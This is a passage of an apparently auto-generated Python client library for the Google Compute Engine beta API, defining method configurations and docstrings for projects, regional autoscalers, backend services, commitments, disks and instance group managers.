request_field=u'metadata',
request_type_name=u'ComputeProjectsSetCommonInstanceMetadataRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetDefaultNetworkTier(self, request, global_params=None):
"""Sets the default network tier of the project. The default network tier is used when an address/forwardingRule/instance is created without specifying the network tier field.
Args:
request: (ComputeProjectsSetDefaultNetworkTierRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetDefaultNetworkTier')
return self._RunMethod(
config, request, global_params=global_params)
SetDefaultNetworkTier.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.setDefaultNetworkTier',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/setDefaultNetworkTier',
request_field=u'projectsSetDefaultNetworkTierRequest',
request_type_name=u'ComputeProjectsSetDefaultNetworkTierRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetUsageExportBucket(self, request, global_params=None):
"""Enables the usage export feature and sets the usage export bucket where reports are stored. If you provide an empty request body using this method, the usage export feature will be disabled.
Args:
request: (ComputeProjectsSetUsageExportBucketRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetUsageExportBucket')
return self._RunMethod(
config, request, global_params=global_params)
SetUsageExportBucket.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.setUsageExportBucket',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/setUsageExportBucket',
request_field=u'usageExportLocation',
request_type_name=u'ComputeProjectsSetUsageExportBucketRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionAutoscalersService(base_api.BaseApiService):
"""Service class for the regionAutoscalers resource."""
_NAME = u'regionAutoscalers'
def __init__(self, client):
super(ComputeBeta.RegionAutoscalersService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified autoscaler.
Args:
request: (ComputeRegionAutoscalersDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionAutoscalers.delete',
ordered_params=[u'project', u'region', u'autoscaler'],
path_params=[u'autoscaler', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/autoscalers/{autoscaler}',
request_field='',
request_type_name=u'ComputeRegionAutoscalersDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified autoscaler.
Args:
request: (ComputeRegionAutoscalersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Autoscaler) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionAutoscalers.get',
ordered_params=[u'project', u'region', u'autoscaler'],
path_params=[u'autoscaler', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/autoscalers/{autoscaler}',
request_field='',
request_type_name=u'ComputeRegionAutoscalersGetRequest',
response_type_name=u'Autoscaler',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeRegionAutoscalersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionAutoscalers.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscaler',
request_type_name=u'ComputeRegionAutoscalersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of autoscalers contained within the specified region.
Args:
request: (ComputeRegionAutoscalersListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionAutoscalerList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionAutoscalers.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field='',
request_type_name=u'ComputeRegionAutoscalersListRequest',
response_type_name=u'RegionAutoscalerList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeRegionAutoscalersPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.regionAutoscalers.patch',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'autoscaler', u'requestId'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeRegionAutoscalersPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeRegionAutoscalersTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionAutoscalers.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/autoscalers/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeRegionAutoscalersTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeRegionAutoscalersUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.regionAutoscalers.update',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'autoscaler', u'requestId'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeRegionAutoscalersUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionBackendServicesService(base_api.BaseApiService):
"""Service class for the regionBackendServices resource."""
_NAME = u'regionBackendServices'
def __init__(self, client):
super(ComputeBeta.RegionBackendServicesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified regional BackendService resource.
Args:
request: (ComputeRegionBackendServicesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionBackendServices.delete',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field='',
request_type_name=u'ComputeRegionBackendServicesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified regional BackendService resource.
Args:
request: (ComputeRegionBackendServicesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendService) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionBackendServices.get',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field='',
request_type_name=u'ComputeRegionBackendServicesGetRequest',
response_type_name=u'BackendService',
supports_download=False,
)
def GetHealth(self, request, global_params=None):
"""Gets the most recent health check results for this regional BackendService.
Args:
request: (ComputeRegionBackendServicesGetHealthRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceGroupHealth) The response message.
"""
config = self.GetMethodConfig('GetHealth')
return self._RunMethod(
config, request, global_params=global_params)
GetHealth.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionBackendServices.getHealth',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}/getHealth',
request_field=u'resourceGroupReference',
request_type_name=u'ComputeRegionBackendServicesGetHealthRequest',
response_type_name=u'BackendServiceGroupHealth',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a regional BackendService resource in the specified project using the data included in the request. There are several restrictions and guidelines to keep in mind when creating a regional backend service. Read Restrictions and Guidelines for more information.
Args:
request: (ComputeRegionBackendServicesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionBackendServices.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/backendServices',
request_field=u'backendService',
request_type_name=u'ComputeRegionBackendServicesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of regional BackendService resources available to the specified project in the given region.
Args:
request: (ComputeRegionBackendServicesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionBackendServices.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/backendServices',
request_field='',
request_type_name=u'ComputeRegionBackendServicesListRequest',
response_type_name=u'BackendServiceList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates the specified regional BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeRegionBackendServicesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.regionBackendServices.patch',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field=u'backendServiceResource',
request_type_name=u'ComputeRegionBackendServicesPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeRegionBackendServicesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionBackendServices.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeRegionBackendServicesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified regional BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information.
Args:
request: (ComputeRegionBackendServicesUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.regionBackendServices.update',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field=u'backendServiceResource',
request_type_name=u'ComputeRegionBackendServicesUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionCommitmentsService(base_api.BaseApiService):
"""Service class for the regionCommitments resource."""
_NAME = u'regionCommitments'
def __init__(self, client):
super(ComputeBeta.RegionCommitmentsService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of commitments.
Args:
request: (ComputeRegionCommitmentsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(CommitmentAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionCommitments.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/commitments',
request_field='',
request_type_name=u'ComputeRegionCommitmentsAggregatedListRequest',
response_type_name=u'CommitmentAggregatedList',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified commitment resource. Get a list of available commitments by making a list() request.
Args:
request: (ComputeRegionCommitmentsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Commitment) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionCommitments.get',
ordered_params=[u'project', u'region', u'commitment'],
path_params=[u'commitment', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/commitments/{commitment}',
request_field='',
request_type_name=u'ComputeRegionCommitmentsGetRequest',
response_type_name=u'Commitment',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a commitment in the specified project using the data included in the request.
Args:
request: (ComputeRegionCommitmentsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionCommitments.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/commitments',
request_field=u'commitment',
request_type_name=u'ComputeRegionCommitmentsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of commitments contained within the specified region.
Args:
request: (ComputeRegionCommitmentsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(CommitmentList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionCommitments.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/commitments',
request_field='',
request_type_name=u'ComputeRegionCommitmentsListRequest',
response_type_name=u'CommitmentList',
supports_download=False,
)
class RegionDiskTypesService(base_api.BaseApiService):
"""Service class for the regionDiskTypes resource."""
_NAME = u'regionDiskTypes'
def __init__(self, client):
super(ComputeBeta.RegionDiskTypesService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Returns the specified regional disk type. Get a list of available disk types by making a list() request.
Args:
request: (ComputeRegionDiskTypesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskType) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionDiskTypes.get',
ordered_params=[u'project', u'region', u'diskType'],
path_params=[u'diskType', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/diskTypes/{diskType}',
request_field='',
request_type_name=u'ComputeRegionDiskTypesGetRequest',
response_type_name=u'DiskType',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of regional disk types available to the specified project.
Args:
request: (ComputeRegionDiskTypesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionDiskTypeList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionDiskTypes.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/diskTypes',
request_field='',
request_type_name=u'ComputeRegionDiskTypesListRequest',
response_type_name=u'RegionDiskTypeList',
supports_download=False,
)
class RegionDisksService(base_api.BaseApiService):
"""Service class for the regionDisks resource."""
_NAME = u'regionDisks'
def __init__(self, client):
super(ComputeBeta.RegionDisksService, self).__init__(client)
self._upload_configs = {
}
def CreateSnapshot(self, request, global_params=None):
"""Creates a snapshot of this regional disk.
Args:
request: (ComputeRegionDisksCreateSnapshotRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('CreateSnapshot')
return self._RunMethod(
config, request, global_params=global_params)
CreateSnapshot.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionDisks.createSnapshot',
ordered_params=[u'project', u'region', u'disk'],
path_params=[u'disk', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/disks/{disk}/createSnapshot',
request_field=u'snapshot',
request_type_name=u'ComputeRegionDisksCreateSnapshotRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified regional persistent disk. Deleting a regional disk removes all the replicas of its data permanently and is irreversible. However, deleting a disk does not delete any snapshots previously made from the disk. You must separately delete snapshots.
Args:
request: (ComputeRegionDisksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionDisks.delete',
ordered_params=[u'project', u'region', u'disk'],
path_params=[u'disk', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/disks/{disk}',
request_field='',
request_type_name=u'ComputeRegionDisksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns a specified regional persistent disk.
Args:
request: (ComputeRegionDisksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Disk) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionDisks.get',
ordered_params=[u'project', u'region', u'disk'],
path_params=[u'disk', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/disks/{disk}',
request_field='',
request_type_name=u'ComputeRegionDisksGetRequest',
response_type_name=u'Disk',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a persistent regional disk in the specified project using the data included in the request.
Args:
request: (ComputeRegionDisksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionDisks.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId', u'sourceImage'],
relative_path=u'projects/{project}/regions/{region}/disks',
request_field=u'disk',
request_type_name=u'ComputeRegionDisksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of persistent disks contained within the specified region.
Args:
request: (ComputeRegionDisksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionDisks.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/disks',
request_field='',
request_type_name=u'ComputeRegionDisksListRequest',
response_type_name=u'DiskList',
supports_download=False,
)
def Resize(self, request, global_params=None):
"""Resizes the specified regional persistent disk.
Args:
request: (ComputeRegionDisksResizeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Resize')
return self._RunMethod(
config, request, global_params=global_params)
Resize.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionDisks.resize',
ordered_params=[u'project', u'region', u'disk'],
path_params=[u'disk', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/disks/{disk}/resize',
request_field=u'regionDisksResizeRequest',
request_type_name=u'ComputeRegionDisksResizeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on the target regional disk.
Args:
request: (ComputeRegionDisksSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionDisks.setLabels',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/disks/{resource}/setLabels',
request_field=u'regionSetLabelsRequest',
request_type_name=u'ComputeRegionDisksSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeRegionDisksTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionDisks.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/disks/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeRegionDisksTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class RegionInstanceGroupManagersService(base_api.BaseApiService):
"""Service class for the regionInstanceGroupManagers resource."""
_NAME = u'regionInstanceGroupManagers'
def __init__(self, client):
super(ComputeBeta.RegionInstanceGroupManagersService, self).__init__(client)
self._upload_configs = {
}
def AbandonInstances(self, request, global_params=None):
"""Schedules a group action to remove the specified instances from the managed instance group. Abandoning an instance does not delete the instance, but it does remove the instance from any target pools that are applied by the managed instance group. This method reduces the targetSize of the managed instance group by the number of instances that you abandon. This operation is marked as DONE when the action is scheduled even if the instances have not yet been removed from the group. You must separately verify the status of the abandoning action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeRegionInstanceGroupManagersAbandonInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AbandonInstances')
return self._RunMethod(
config, request, global_params=global_params)
AbandonInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.abandonInstances',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/abandonInstances',
request_field=u'regionInstanceGroupManagersAbandonInstancesRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersAbandonInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified managed instance group and all of the instances in that group.
Args:
request: (ComputeRegionInstanceGroupManagersDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionInstanceGroupManagers.delete',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupManagersDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DeleteInstances(self, request, global_params=None):
"""Schedules a group action to delete the specified instances in the managed instance group. The instances are also removed from any target pools of which they were a member. This method reduces the targetSize of the managed instance group by the number of instances that you delete. This operation is marked as DONE when the action is scheduled even if the instances are still being deleted. You must separately verify the status of the deleting action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeRegionInstanceGroupManagersDeleteInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DeleteInstances')
return self._RunMethod(
config, request, global_params=global_params)
DeleteInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.deleteInstances',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/deleteInstances',
request_field=u'regionInstanceGroupManagersDeleteInstancesRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersDeleteInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns all of the details about the specified managed instance group.
Args:
request: (ComputeRegionInstanceGroupManagersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupManager) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionInstanceGroupManagers.get',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupManagersGetRequest',
response_type_name=u'InstanceGroupManager',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a managed instance group using the information that you specify in the request. After the group is created, it schedules an action to create instances in the group using the specified instance template. This operation is marked as DONE when the group is created even if the instances in the group have not yet been created. You must separately verify the status of the individual instances with the listmanagedinstances method.
A regional managed instance group can contain up to 2000 instances.
Args:
request: (ComputeRegionInstanceGroupManagersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers',
request_field=u'instanceGroupManager',
request_type_name=u'ComputeRegionInstanceGroupManagersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of managed instance groups that are contained within the specified region.
Args:
request: (ComputeRegionInstanceGroupManagersListRequest) input message
